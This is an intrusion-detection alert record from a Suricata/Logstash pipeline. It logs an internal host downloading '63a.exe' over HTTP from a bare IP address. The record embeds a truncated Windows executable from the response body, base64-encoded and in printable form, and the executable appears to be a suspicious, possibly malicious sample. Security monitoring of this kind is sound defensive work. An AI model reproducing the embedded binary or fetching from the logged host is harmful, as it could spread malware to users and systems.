{
  "_index": "logstash-alert-2022.09.11",
  "_type": "_doc",
  "_id": "SgoALoMBfTCdXV7acP_0",
  "_version": 1,
  "_score": null,
  "_source": {
    "stream": 1,
    "input": {
      "type": "log"
    },
    "proto": "TCP",
    "http": {
      "http_method": "GET",
      "hostname": "104.243.42.63",
      "url": "/download/63a.exe",
      "protocol": "HTTP/1.1",
      "http_response_body_printable": "MZ......................@...............................................!..L.!This program cannot be run in DOS mode.\r\r\n$.......V..X...............\n.......\n.......\n.......\n........t...t.K........\n.......\n.......\n:......\n.......\n.......\n\"......\n.......\n....Rich....................PE..d......b..........\"..........V.......U.........@..............................\"...........`.................................................0...(.............!..............P\".. ......................................8............................................text............................... ..`.rdata..4...........................@..@.data...<...........................@....pdata........!.....................@..@_RDATA.......@\"......l .............@..@.reloc... ...P\"..\"...n .............@..B................................................................................................................................................................................................................................................H..(H.\rU........H.\ri....H?..H..(................H.T$.H.L$.H..(H.|$8....r.H.T$8H.L$0.....H.T$8H.L$0..<...H..(....H.L$............L.D$.H.T$.H.L$.H..(..H.D$0H.. H.D$0H.D$8H9D$0t.H.L$0.....H..H.L$@.......H..(....H.L$.H.D$.......H.T$.H.L$.H..(3.H.L$8.....H..(..H.L$.H..(H.D$0H...\n...H..(......H.L$.H..(H.D$0H...:...H..(......H.L$.H..(H.L$0.....H.D$0H.......H..(............H.L$.H..(H.L$0.....H..(.........H.L$.H..(H.D$0H.......H..(.......T$.H.L$.H..(H.L$0.y....D$8.....t.. ...H.L$0.C;..H.D$0H..(......H.T$.H.L$.H..HH.D$XH..H..'H.L$XH..H.D$PH..H.D$0.....Hk..H.L$0H...H.D$(H.D$8....H.D$PH.L$(H..H+.H.D$ H.|$ .r\nH.|$ 'w........3...u.3...u.H.D$PH.L$(H..H..H........L.D$.H.T$.H.L$.H..(H.L$0.#...L..H.T$@H.L$8.....H..(.............H.L$.H..(H.D$0H.......H..(......H.L$.H...H.D$ H.x..r...$........$.......$H......H.L$.H..XH.D$`H.D$(H.D$(H.D$ H.D$(H...H.D$0H.D$(H...H.D$8H.L$(.\r...H.D$ H.8.t|H.D$0L..H.D$ H..H.L$`.....H.D$8H.L$ H..H..H+.H...H.D$@H.L$`.\"...H.L$@L..H.L$ H..H...:...H.D$ H......H.D$0H......H.D$8H......H..X..H.L$.H..HH.D$PH...j...H.D$PH............tGH.D$PH..H.D$(H.L$P.....H.D$0H.D$PH...-...H.D$PH.@.H..L..H.T$(H.L$0.o...H.D$PH.@.....H.D$PH.@......D$ ......Hk..H.L$PH..H..H.T$ H........H..H..........H.T$.H.L$.H.D$.H.L$.............L.D$.H.T$.H.L$.H..(H.T$@H.L$8.>...H..(..........L.D$.H.T$.H.L$.H..(HkD$@ H..H.L$8.\n...H..(......D.L$ L.D$.H.T$.H.L$.H..8.\rf........H.\r............u........H......H.D$ .T$ 3...3.H..8...........H.T$.H.L$.H..(../..H.L$0H..H.|$8.t..h/..H.L$8H.....Y/..H.\r....H..H..(...........H.L$.H..(H.|$0.u..*/..H.\r....H....../..H.L$0H..H..H..(..........H.T$.H.L$.H..(.}/..H.L$0H..../..H.L$8H..H..(....................H.T$.H.L$.L.D$.L.L$ H......H..$....H.D$8H.D$0....H.D$H....H.|$8.t`H.D$8H.@8H.D$0H.|$0.t@H.D$0H.x..u4H.D$8.x@.~)H.D$0H.D$HH.D$8.@@...H.H.L$8H.IHH...H.D$0H.L$0.n....y...H.D$`.....H..x...H.L$`H.....D$@...........K...H.D$(H.|$(........D$ .....|$ ..........H..$....H.D$PHcD$ L.L$PL..$....H..H.L$(..#...D$$H.D$P.....|$$.~ .D$ 9D$$}..D$$9D$@u.._...D$$.D$@.|$$.~..D$ .L$$.D...D$ ...D$ ..d.D$ HcD$ H..H.L$(......H.D$XH.|$X.u...H.D$XH.D$(.=....j-..H.D$h..-..L.D$(H......H.L$hH....H.|$(.t.H.L$(..O...H.|$8.tFH.L$0.....H.|$H.t4H.L$H.......-..H.D$p..,..H......H.L$pH....H.L$H.i...H........................H.T$.H.L$.L.D$.L.L$ H......H..$....H.D$8H.D$0....H.D$H....H.|$8.t`H.D$8H.@8H.D$0H.|$0.t@H.D$0H.x..u4H.D$8.x@.~)H.D$0H.D$HH.D$8.@@...H.H.L$8H.IHH...H.D$0H.L$0......),..H.D$`..+..H..0...H.L$`H.....D$@...............H.D$(H.|$(........D$ .....|$ ..........H..$....H.D$PHcD$ L.L$PL..$....H..H.L$(.x!...D$$H.D$P.....|$$.~ .D$ 9D$$}..D$$9D$@u.._...D$$.D$@.|$$.~..D$ .L$$.D...D$ ...D$ ..d.D$ HcD$ H..H.L$(..M...H.D$XH.|$X.u...H.D$XH.D$(.=.....+..H.D$h..*..L.D$(H......H.L$hH....H.|$(.t.H.L$(......H.|$8.tFH.L$0.U...H.|$H.t4H.L$H.......*..H.D$p.T*..H......H.L$pH....H.L$H.....H........................H.T$.H.L$.L.D$.L.L$ H..xH..$....H.D$0H.D$8....H..$.....e....D$@.|$@........D$@...H.H..$..........:......H.|$0.tWH.D$0H.@8H.D$8H.D$8H.x..u*H.D$0.x@.~.H.D$0.@@...H.H.L$0H.IHH...H.D$8.=.....u\nH.L$8.......)..H.D$X.J)..H......H.L$XH...............\n...........D$D...........p...H.D$(H.|$(........D$ .....|$ ..........H..$....H.D$HHcD$ L.L$HL..$....H..H.L$(......D$$H.D$H.....|$$.~ .D$ 9D$$}..D$$9D$Du.._...D$$.D$D.|$$.~..D$ .L$$.D...D$ ...D$ ..d.D$ HcD$ H..H.L$(......H.D$PH.|$P.u...H.D$PH.D$(.=.....(..H.D$`.%(..L.D$(H......H.L$`H....H.|$(.t.H.L$(..t...H.|$0.t.H.|$8.t\nH.L$8.....H..x..............H.T$.H.L$.L.D$.L.L$ H..xH..$....H.D$0H.D$@....H..$..........D$8H.|$0.tn.|$8.tg.D$8..H.H..$..........:tNH.D$0H.@8H.D$@H.D$@H.x..u*H.D$0.x@.~.H.D$0.@@...H.H.L$0H.IHH...H.D$@H.L$@.k....v'..H.D$X..'..H......H.L$XH.....D$<...........H...H.D$(H.|$(........D$ .....|$ ..........H..$....H.D$HHcD$ L.L$HL..$....H..H.L$(......D$$H.D$H.....|$$.~ .D$ 9D$$}..D$$9D$<u.._...D$$.D$<.|$$.~..D$ .L$$.D...D$ ...D$ ..d.D$ HcD$ H..H.L$(......H.D$PH.|$P.u...H.D$PH.D$(.=....g&..H.D$`..%..L.D$(H..}...H.L$`H....H.|$(.t.H.L$(..L...H.|$0.t\nH.L$@.....H..x..............H.L$.H..8H.|$@.tiH.D$@H.x..t4..%..H.D$ ..%..H.L$@D.I4H.L$@L.A.H..K...H.L$ H.....)..%..H.D$(.P%..H.L$@D.A4H..(...H.L$(H....H..8..................H.L$.H..8.r%..H.D$ ..%..H.L$ L..H..H.L$@.#...H..8...............H..(..\"...x..u.3.....\"..H..(....................H..(.g\"...x..u..\r.Z\"..H.......H..(..............H.L$.H...H.D$ H..$H.<$.u.3...H..$..L....u.3..\nH..$H.H...H.......................H.L$.H..8H.D$@H.D$ H.|$ .u..2H.D$ ..........H.D$ ..L....u...H.D$ H.H...H.......H..8.............H.L$.H..(H.|$0.u......H.D$0.x..u......H.D$0H.x..t.H.D$0H.H.......H.D$0H.x..t.H.D$0H.H.......H.D$",
      "length": 5552,
      "http_content_type": "application/octet-stream",
      "server": "Microsoft-IIS/8.5",
      "http_response_body": "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",
      "status": 200
    },
    "log": {
      "offset": 278072990,
      "file": {
        "path": "/var/log/suricata/eve-discovery-0.json"
      }
    },
    "src_port": 61354,
    "hostname_info": {
      "domain": "104.243.42.63",
      "domain_without_tld": "104.243.42.63",
      "url": "104.243.42.63",
      "host": "104.243.42.63"
    },
    "flow": {
      "pkts_toclient": 6,
      "bytes_toserver": 307,
      "start": "2022-09-11T21:22:03.292663+0200",
      "dest_ip": "104.243.42.63",
      "dest_port": 80,
      "bytes_toclient": 6101,
      "src_ip": "10.8.9.101",
      "pkts_toserver": 4,
      "src_port": 61354
    },
    "src_ip": "10.8.9.101",
    "net_info": {},
    "@version": "1",
    "geoip": {
      "provider": {
        "autonomous_system_number": 20473,
        "autonomous_system_organization": "Choopa, LLC"
      },
      "latitude": 25.8124,
      "country_name": "United States",
      "continent": {
        "code": "NA",
        "geoname_id": 6255149,
        "name": "North America"
      },
      "longitude": -80.2401,
      "country_code3": "US",
      "coordinate": [
        -80.2401,
        25.8124
      ],
      "continent_code": "NA",
      "country": {
        "geoname_id": 6252001,
        "iso_code": "US",
        "name": "United States"
      },
      "registered_country": {
        "geoname_id": 6252001,
        "iso_code": "US",
        "name": "United States"
      },
      "timezone": "America/New_York",
      "postal": {
        "code": "33142"
      },
      "subdivisions": [
        {
          "geoname_id": 4155751,
          "iso_code": "FL",
          "name": "Florida"
        }
      ],
      "ip": "104.243.42.63",
      "location": {
        "lat": 25.8124,
        "lon": -80.2401
      },
      "city": {
        "geoname_id": 4164138,
        "name": "Miami"
      },
      "country_code2": "US",
      "city_name": "Miami"
    },
    "discovery": {
      "value": "104.243.42.63",
      "key": "http.hostname",
      "asset": "10.8.9.101",
      "asset_net": null,
      "asset_role": []
    },
    "@timestamp": "2022-09-11T19:22:03.309Z",
    "ether": {
      "dest_mac": "20:e5:2a:b6:93:f1",
      "src_mac": "00:08:02:1c:47:ae"
    },
    "alert": {
      "action": "allowed",
      "rev": 1,
      "category": "Unknown Traffic",
      "severity": 3,
      "gid": 1,
      "signature": "SN SIGHTINGS Newly discovered HTTP server hosts not seen",
      "metadata": {
        "provider": [
          "Stamus"
        ],
        "stamus_classification": [
          "stamus_sightings"
        ],
        "sightings_key": [
          "http.hostname"
        ],
        "created_at": [
          "2022_01_25"
        ],
        "updated_at": [
          "2022_01_25"
        ],
        "sightings_asset": [
          "src_ip"
        ]
      },
      "signature_id": 3120001
    },
    "metadata": {
      "flowbits": [
        "min.gethttp",
        "exe.no.referer",
        "http.dottedquadhost",
        "stamus.sightings"
      ]
    },
    "dest_port": 80,
    "app_proto": "http",
    "payload": "R0VUIC9kb3dubG9hZC82M2EuZXhlIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMDQuMjQzLjQyLjYzDQoNCg==",
    "host": "SSProbe-1",
    "ecs": {
      "version": "1.12.0"
    },
    "tx_id": 0,
    "timestamp": "2022-09-11T21:22:03.309124+0200",
    "payload_printable": "GET /download/63a.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nHost: 104.243.42.63\r\n\r\n",
    "type": "json-log",
    "tags": [
      "beats_input_codec_json_applied"
    ],
    "dest_ip": "104.243.42.63",
    "packet_info": {
      "linktype": 1
    },
    "event_type": "alert",
    "packet": "IOUqtpPxAAgCHEeuCABFAAAor3BAAIAGpMAKCAllaPMqP++qAFAKT+54MM1wIlAQ+vCEkgAA",
    "alerted": true,
    "agent": {
      "version": "7.16.1",
      "hostname": "SSProbe-1",
      "id": "9f305fa4-6db1-485c-81f9-598dce1469e3",
      "type": "filebeat",
      "ephemeral_id": "da6efa0f-f749-4bb3-8918-c3514cb604ff",
      "name": "SSProbe-1"
    },
    "in_iface": "tppdummy0",
    "flow_id": 975504810257998
  },
  "fields": {
    "flow.start": [
      "2022-09-11T19:22:03.292Z"
    ],
    "@timestamp": [
      "2022-09-11T19:22:03.309Z"
    ],
    "EveBox": [
      975504810257998
    ],
    "Scirius": [
      3120001
    ],
    "timestamp": [
      "2022-09-11T19:22:03.309Z"
    ]
  },
  "highlight": {
    "alert.signature": [
      "SN @kibana-highlighted-field@SIGHTINGS@/kibana-highlighted-field@ Newly discovered HTTP server hosts not seen"
    ]
  },
  "sort": [
    1662924123309
  ]
}